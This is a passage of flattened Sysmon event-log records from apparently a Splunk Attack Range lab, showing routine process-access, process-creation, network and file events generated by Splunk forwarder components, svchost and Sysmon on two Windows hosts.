Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62B6794975EF7715B8C09992CD781CC7,SHA256=2A6224E26BE7FEE16E34B52FE7213E1EDAE5CDE80E645D00058F1F243CBE3003,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001054525Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:24.552{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A7A1D979A3DD29E5B64011CCABB5DED,SHA256=7AAF248DE76B77C90466CEFECBBE1DA5A6EDC05AD43AD287934426C6D9A5DE75,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810290Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.912{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F83C-60EB-DD79-00000000D001}868C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810289Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:24.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810288Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810287Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:24.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810286Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810285Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:24.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810284Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810283Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:24.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810282Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810281Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:24.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810280Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.912{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F83C-60EB-DD79-00000000D001}868C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810279Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.912{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F83C-60EB-DD79-00000000D001}868C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810278Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.898{0C1E0330-F83C-60EB-DD79-00000000D001}868C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000810277Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.568{0C1E0330-F83C-60EB-DC79-00000000D001}38242424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000810276Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:23.264{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57458-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810275Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.397{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D18F89CD580998EF35FCA9C00560194A,SHA256=BEF58958CBF9AB6EA5F75BF8E37AC829CB5F1D934FC8F0961680D26CEACACE00,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810274Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.318{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F83C-60EB-DC79-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810273Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:24.303{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810272Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.303{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810271Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:24.303{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810270Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.303{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810269Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:24.303{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810268Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.303{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810267Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:24.303{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810266Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.303{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810265Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:24.303{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F83C-60EB-DC79-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810264Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.303{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810263Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.303{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program 